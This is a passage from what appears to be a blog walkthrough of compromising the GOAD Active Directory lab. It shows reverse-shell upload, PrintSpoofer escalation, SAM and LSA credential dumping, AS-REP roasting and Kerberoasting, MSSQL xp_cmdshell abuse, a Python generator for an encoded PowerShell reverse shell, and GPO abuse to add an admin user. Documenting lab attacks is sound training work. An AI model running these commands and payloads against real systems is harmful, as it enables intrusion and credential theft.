class="line"><span class="cl">| NetBIOS_Domain_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Computer_Name: CASTELBLACK +</span></span><span class="line"><span class="cl">| DNS_Domain_Name: north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Computer_Name: castelblack.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Tree_Name: sevenkingdoms.local +</span></span><span class="line"><span class="cl">|_ Product_Version: 10.0.17763 +</span></span><span class="line"><span class="cl">| ms-sql-info: +</span></span><span class="line"><span class="cl">| 192.168.0.152:1433: +</span></span><span class="line"><span class="cl">| Version: +</span></span><span class="line"><span class="cl">| name: Microsoft SQL Server 2019 RTM +</span></span><span class="line"><span class="cl">| number: 15.00.2000.00 +</span></span><span class="line"><span class="cl">| Product: Microsoft SQL Server 2019 +</span></span><span 
class="line"><span class="cl">| Service pack level: RTM +</span></span><span class="line"><span class="cl">| Post-SP patches applied: false +</span></span><span class="line"><span class="cl">|_ TCP port: 1433 +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-08T06:28:57+00:00; 0s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-08T06:28:14 +</span></span><span class="line"><span class="cl">|_Not valid after: 2054-11-08T06:28:14 +</span></span><span class="line"><span class="cl">3389/tcp open ms-wbt-server Microsoft Terminal Services +</span></span><span class="line"><span class="cl">| rdp-ntlm-info: +</span></span><span class="line"><span class="cl">| Target_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Domain_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Computer_Name: CASTELBLACK +</span></span><span class="line"><span class="cl">| DNS_Domain_Name: north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Computer_Name: castelblack.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Tree_Name: sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Product_Version: 10.0.17763 +</span></span><span class="line"><span class="cl">|_ System_Time: 2024-11-07T17:15:22+00:00 +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T17:15:27+00:00; -2s from scanner time. 
+</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-06T09:32:35 +</span></span><span class="line"><span class="cl">|_Not valid after: 2025-05-08T09:32:35 +</span></span><span class="line"><span class="cl">Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">Host script results: +</span></span><span class="line"><span class="cl">|_clock-skew: mean: -1s, deviation: 0s, median: -1s +</span></span><span class="line"><span class="cl">|_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) +</span></span><span class="line"><span class="cl">| smb2-security-mode: +</span></span><span class="line"><span class="cl">| 3:1:1: +</span></span><span class="line"><span class="cl">|_ Message signing enabled but not required +</span></span><span class="line"><span class="cl">| smb2-time: +</span></span><span class="line"><span class="cl">| date: 2024-11-07T17:15:22 +</span></span><span class="line"><span class="cl">|_ start_date: N/A +</span></span></code></pre></td></tr></table> +</div> +</div><hr> +<ul> +<li> +<p>domains - sevenkingdoms.local north.sevenkingdoms.local</p> +</li> +<li> +<p>192.168.0.150 - kingslanding.sevenkingdoms.local sevenkingdoms.local</p> +</li> +<li> +<p>192.168.0.151 - winterfell.north.sevenkingdoms.local north.sevenkingdoms.local</p> +</li> +<li> +<p>192.168.0.152 - castelblack.north.sevenkingdoms.local</p> +</li> +</ul> +<hr> +<h3 id="web-server">web server +</h3><p><img src="https://f0rk3b0mb.github.io/images/goad_light/web.jpeg" + + + + loading="lazy" + + alt="webpage" + + +></p> +<p>there is a webpage that allows file upload , there are no filters so i upload a .aspx reverse shell payload</p> +<p>we get a shell</p> +<p><img 
src="https://f0rk3b0mb.github.io/images/goad_light/web_shell.jpeg" + + + + loading="lazy" + + alt="shell" + + +></p> +<p>The current user &ldquo;iis apppool\defaultapppool&rdquo; has the following priviledges SeImpersonatePrivilege</p> +<p>This can be exploited using prinspoofer &raquo; <a class="link" href="https://github.com/itm4n/PrintSpoofer" target="_blank" rel="noopener" + >here</a></p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">.\printspoofer.exe -i -c cmd +</span></span></code></pre></td></tr></table> +</div> +</div><p>We are now the user &ldquo;nt authority\system&rdquo;</p> +<p>From here we can extract the sam.hive and system.hive since we have the full control on the system.</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span><span class="lnt">6 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">reg save hklm\sam .\sam.hive +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">reg save hklm\system .\system.hive +</span></span><span class="line"><span class="cl"> +</span></span></code></pre></td></tr></table> +</div> +</div><p>From these we can get the Administrator ntlm hash that we can use to login</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre 
tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">impacket-secretsdump -sam sam.hive -system system.hive LOCAL +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">[*] Target system bootKey: 0xe58fc6e5f506631517c563ede86bead7 +</span></span><span class="line"><span class="cl">[*] Dumping local SAM hashes (uid:rid:lmhash:nthash) +</span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: +</span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4363b6dc0c95588964884d7e1dfea1f7::: +</span></span><span class="line"><span class="cl">vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: +</span></span><span class="line"><span class="cl">[*] Cleaning up... 
+</span></span></code></pre></td></tr></table> +</div> +</div><p>We can successfully login via winrm in winterfell.north.sevenkingdoms.local and castleblack.north.sevenkingdoms.local as user Administrator</p> +<p><img src="https://f0rk3b0mb.github.io/images/goad_light/hash.jpeg" + + + + loading="lazy" + + alt="login" + + +></p> +<p>This is an easy way to pwn both machines , ill try to find another way in.</p> +<hr> +<h3 id="enumerate-users">Enumerate users +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="n">enum4linux</span> <span class="o">-</span><span class="n">U</span> <span class="mf">192.168</span><span class="o">.</span><span class="mf">0.150</span> +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Administrator +</span></span><span class="line"><span class="cl">Guest +</span></span><span class="line"><span class="cl">arya.stark +</span></span><span class="line"><span class="cl">brandon.stark +</span></span><span 
class="line"><span class="cl">catelyn.stark +</span></span><span class="line"><span class="cl">eddard.stark +</span></span><span class="line"><span class="cl">hodor +</span></span><span class="line"><span class="cl">jeor.mormont +</span></span><span class="line"><span class="cl">jon.snow +</span></span><span class="line"><span class="cl">krbtgt +</span></span><span class="line"><span class="cl">rickon.stark +</span></span><span class="line"><span class="cl">robb.stark +</span></span><span class="line"><span class="cl">samwell.tarly &gt;&gt;&gt; Heartsbane +</span></span><span class="line"><span class="cl">sansa.stark +</span></span><span class="line"><span class="cl">sql_svc +</span></span><span class="line"><span class="cl">vagrant +</span></span></code></pre></td></tr></table> +</div> +</div><p>we get one password in the users description</p> +<p>we can enumerate users while using the creds to discover more</p> +<hr> +<p>We test for password reuse and to check what services we can access with the creds</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">crackmapexec winrm -u users.txt -p pass.txt -d north.sevenkingdoms.local 192.168.0.152 --continue-on-success +</span></span></code></pre></td></tr></table> +</div> +</div><p><img src="https://f0rk3b0mb.github.io/images/goad_light/winrm.jpeg" + + + + loading="lazy" + + alt="winrm" + + +></p> +<hr> +<h3 id="asreproasting">ASREProasting +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span><span class="lnt">6 +</span><span 
class="lnt">7 +</span><span class="lnt">8 +</span><span class="lnt">9 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">[-] User sansa.stark doesn&#39;t have UF_DONT_REQUIRE_PREAUTH set +</span></span><span class="line"><span class="cl">$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:f080ed05bd30304fa0bea81ca05405f6$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 +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:11e9b0e6b849834048f19d77ffaab958$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 +</span></span></code></pre></td></tr></table> +</div> +</div><p>We can try to crack the hashes with hashcat</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt +</span></span></code></pre></td></tr></table> +</div> +</div><p>we get &ldquo;brandon.stark : iseedeadpeople&rdquo;</p> +<hr> +<h3 id="kerberoasting">KERBEroasting +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 
+</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">impacket-GetUserSPNs -dc-ip 192.168.0.151 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -request +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$1d34574ce34accafda00ef02b9da270f$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 +</span></span><span class="line"><span class="cl">$krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$84792126b6065b19368a23f2d3f946f0$261a5265d61be8c8f584a9a1c2c64e61601d81421669de0bdcf1ded1a12cdd258414965992eff28bce23b5ba37b187a3e703cb308ce4d3dc053e5fa6a32a35efbe39e39b1e5a6716613fc54c84aaf533e491f306026ffdcb37585b377a4dfa0b8f43bede9baec2cbda0a35f608af18f0c310e2011c79df83861d136a895dbf79dcd60a8f60a0e621cb38d12659856ea8175c5f25a1c6a3fbf416576e7f78827ce04df3ccda4dd720d28b9142ec97ff2d4cdf8a90bb71c139e9b379ec83a4f06b1061850b51b5a3b5945dda4b7ecc8d0b496ec218a763529aa677ff87faac058f4734351a4e8b4101e5e42f014969696bb0f94f619e8a82e8ce52f0b83f67a9aebb317cc377415210eee3f7c8557c29c5d93430e4d38b8f16f9b392476e4e82eb7c8118a5af99c52e6b97982dc131bd67d3fb1a0bbb910b50bde9071ea6e2200d926b209a0edae9ec922d9ec72b359aaaa3939f8442759cc247e4b23e824909897f12f560213a458b8fd635fdc48fdaef5c87f75342582719c87c24e1d479d4c1bc1e5860c38982a828f10af5afe728daf78c41b80b9e8d23b218d84010a052f4815ae48737d754d7c2662dfc9250587795bd417fbe3ee7406fd485103bea60c0d3162241b73affb286fb75e6479b1c9a564fad284622ab917068f0715e3521aa3b971f533e52d298377ac1f0284681367c75cafe05407fbe378afebb50df4be14378ff3131b93c8b33e8fb34420e6e166edd507abd729826e3fee1d5d882c983e6a4c3400698dbe15a3f0722a6bca18687e06710d6ff53578881a524a6b9e
12ad25ac8376a75351cc4301e4379d5ee9f196550df0aa47fbe3c09890cfd84c48182c63a411d1c2a3c480c09d2c624d0ac3679cc2aa2c7eb7b8755c585b6075e4c77be5ac8a9338904098b3bdcb79fd7fab1f6cee55641bf6e113790951528b78821e508d07a59c0f1da04e944048f5c346a75ebd9899d7fc9da096a75587a103b2a95a50ada643044d8107859024bec2215107df01ed17cecef2c5e2573c625d45ddef49f4128f22d63ebddd7beb815ef6db2c64999b74fa800a39886c844a8955052e59c7708bd6aa1fb4a2ee874c7fb644cfa7f782b479c71b4cb89a8452629444a6a0522d2d82401a6e722b06aa067eaf6f002c3b2bf0a41ffbb2419fc4454f5d6f17e9888fd597428452a02ad795872cad2389e54b541a9d200759dd6cab82456da66aab93d62a8c3b4761c7e72684a294a37b1ae2a4ff81de17d686893c74a1eb786d4dcd3b3b91e8aea09e66d8ff3d70cea1f10ea19eaa5968798f52336c0d76357c8844914656aa720b6cc0bcc52049b6befa4d9de59f7de764dea1c52814f55737efd49625126adf6075289221d9869ca7165fbf6bef70318c18fb5f46dd722c9bcb019a690462cf369fc1eb1e97dda1a7e172f83f0c44064e4f4d03184e265216647750f50926d396f1a67820b2c2c8221e72ba49bd8612cf3cabdccee89f2cfdb467a7615a96681ab1b7b +</span></span></code></pre></td></tr></table> +</div> +</div><p>we get password &ldquo;jon.snow : iknownothing&rdquo;</p> +<p>This user can login via RDP on winterfell and MQSQL on castleblack</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">crackmapexec mssql castleblack.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">MSSQL castleblack 1433 None [*] None (name:castleblack.north.sevenkingdoms.local) 
(domain:north.sevenkingdoms.local) +</span></span><span class="line"><span class="cl">MSSQL castleblack 1433 None [+] north.sevenkingdoms.local\jon.snow:iknownothing (Pwn3d!) +</span></span></code></pre></td></tr></table> +</div> +</div><hr> +<h3 id="mssql">MSSQL +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">impacket-mssqlclient -windows-auth north.sevenkingdoms.local/jon.snow:iknownothing@192.168.0.152 +</span></span></code></pre></td></tr></table> +</div> +</div><p>Checking impersonation abilities</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">execute as database permission_name state_desc grantee grantor +</span></span><span class="line"><span class="cl">---------- -------- --------------- ---------- ------------------- ---------------------------- +</span></span><span class="line"><span class="cl">b&#39;USER&#39; master IMPERSONATE GRANT NORTH\arya.stark dbo +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">b&#39;USER&#39; msdb IMPERSONATE GRANT NORTH\arya.stark dbo +</span></span><span 
class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">b&#39;USER&#39; msdb IMPERSONATE GRANT dc_admin MS_DataCollectorInternalUser +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">b&#39;LOGIN&#39; b&#39;&#39; IMPERSONATE GRANT NORTH\samwell.tarly sa +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">b&#39;LOGIN&#39; b&#39;&#39; IMPERSONATE GRANT NORTH\brandon.stark NORTH\jon.snow +</span></span></code></pre></td></tr></table> +</div> +</div><ul> +<li>A “Login” grants the principal entry into the SERVER</li> +<li>A “User” grants a login entry into a single DATABASE</li> +</ul> +<p>User &ldquo;samwell.tarly&rdquo; can impersonate login of &ldquo;sa&rdquo;, so we have to login to mssql as samwell first and then run.</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">exec_as_login sa +</span></span><span class="line"><span class="cl">enable_xp_cmdshell +</span></span><span class="line"><span class="cl">xp_cmdshell whoami +</span></span></code></pre></td></tr></table> +</div> +</div><p>from here we can get a reverse shell as user sql_svc</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span 
class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="c1">#!/usr/bin/env python</span> +</span></span><span class="line"><span class="cl"><span class="n">import</span> <span class="n">base64</span> +</span></span><span class="line"><span class="cl"><span class="n">import</span> <span class="n">sys</span> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span> +</span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;usage : </span><span class="si">%s</span><span class="s1"> ip port&#39;</span> <span class="o">%</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> +</span></span><span class="line"><span class="cl"> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"><span class="n">payload</span><span class="o">=</span><span class="s2">&#34;&#34;&#34; 
+</span></span></span><span class="line"><span class="cl"><span class="s2">$c = New-Object System.Net.Sockets.TCPClient(&#39;</span><span class="si">%s</span><span class="s2">&#39;,</span><span class="si">%s</span><span class="s2">); +</span></span></span><span class="line"><span class="cl"><span class="s2">$s = $c.GetStream();[byte[]]$b = 0..65535|</span><span class="si">%%</span><span class="s2">{0}; +</span></span></span><span class="line"><span class="cl"><span class="s2">while(($i = $s.Read($b, 0, $b.Length)) -ne 0){ +</span></span></span><span class="line"><span class="cl"><span class="s2"> $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i); +</span></span></span><span class="line"><span class="cl"><span class="s2"> $sb = (iex $d 2&gt;&amp;1 | Out-String ); +</span></span></span><span class="line"><span class="cl"><span class="s2"> $sb = ([text.encoding]::ASCII).GetBytes($sb + &#39;ps&gt; &#39;); +</span></span></span><span class="line"><span class="cl"><span class="s2"> $s.Write($sb,0,$sb.Length); +</span></span></span><span class="line"><span class="cl"><span class="s2"> $s.Flush() +</span></span></span><span class="line"><span class="cl"><span class="s2">}; +</span></span></span><span class="line"><span class="cl"><span class="s2">$c.Close() +</span></span></span><span class="line"><span class="cl"><span class="s2">&#34;&#34;&#34;</span> <span class="o">%</span> <span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"><span class="n">byte</span> <span class="o">=</span> <span class="n">payload</span><span class="o">.</span><span class="n">encode</span><span 
class="p">(</span><span class="s1">&#39;utf-16-le&#39;</span><span class="p">)</span> +</span></span><span class="line"><span class="cl"><span class="n">b64</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64encode</span><span class="p">(</span><span class="n">byte</span><span class="p">)</span> +</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;powershell -exec bypass -enc </span><span class="si">%s</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="n">b64</span><span class="o">.</span><span class="n">decode</span><span class="p">())</span> +</span></span></code></pre></td></tr></table> +</div> +</div><hr> +<h3 id="bloodhound">Bloodhound +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">bloodhound-python -u brandon.stark -p iseedeadpeople -d north.sevenkingdoms.local -c all -dc winterfell.north.sevenkingdoms.local -ns 192.168.0.151 +</span></span></code></pre></td></tr></table> +</div> +</div><p>Here we can mark the high value targets and the users that we have compromised. 
Bloodhound is useful to get a visual representation of the active directory environment.</p> +<hr> +<h3 id="privilege-escalation">Privilege escalation +</h3><p>We can modify the GPO &quot;&quot; as user samwell.tarly</p> +<p><img src="https://f0rk3b0mb.github.io/images/goad_light/privesc.jpeg" + + + + loading="lazy" + + alt="bloodhound" + + +></p> +<p>Here we willl utilize a tool <a class="link" href="https://github.com/Hackndo/pyGPOAbuse" target="_blank" rel="noopener" + >pygpoabuse</a></p> +<p>We need to get the gpoid , this can be done by loggin in via rdp as jon.snow and running</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Get-GPO -All -Domain &#39;north.sevenkingdoms.local&#39; +</span></span></code></pre></td></tr></table> +</div> +</div><p>Then&hellip;</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">pygpoabuse.py north.sevenkingdoms.local/samwell.tarly -gpo-id 848cf9d5-81b3-49d6-b628-d8fbcc1a322c +</span></span></code></pre></td></tr></table> +</div> +</div><p>This creates an admin user called &ldquo;john&rdquo; with the password &ldquo;H4x00r123..&rdquo;</p> +<p>We can now login via winrm</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 
+</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 5986 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) +</span></span><span class="line"><span class="cl">HTTP 192.168.0.151 5986 WINTERFELL [*] https://192.168.0.151:5986/wsman +</span></span><span class="line"><span class="cl">WINRM 192.168.0.151 5986 WINTERFELL [+] north.sevenkingdoms.local\john:H4x00r123.. (Pwn3d!) +</span></span></code></pre></td></tr></table> +</div> +</div><hr> +<p>Using crackmap exec smb and the new user</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">crackmapexec smb 192.168.0.151 -u john -p &#34;H4x00r123..&#34; --lsa +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">B 192.168.0.151 445 WINTERFELL [*] Windows 10 / Server 2019 Build 
17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumping LSA secrets +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\WINTERFELL$:aes256-cts-hmac-sha1-96:9b9cfb7bc4b4696ac33184f5aef050c90c18bf5c5bbdc9dadbe0e538d401e205 +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\WINTERFELL$:aes128-cts-hmac-sha1-96:939fc4f35f4894dca4328d7a1788b7ee +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\WINTERFELL$:des-cbc-md5:1680497f851ad66d +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL 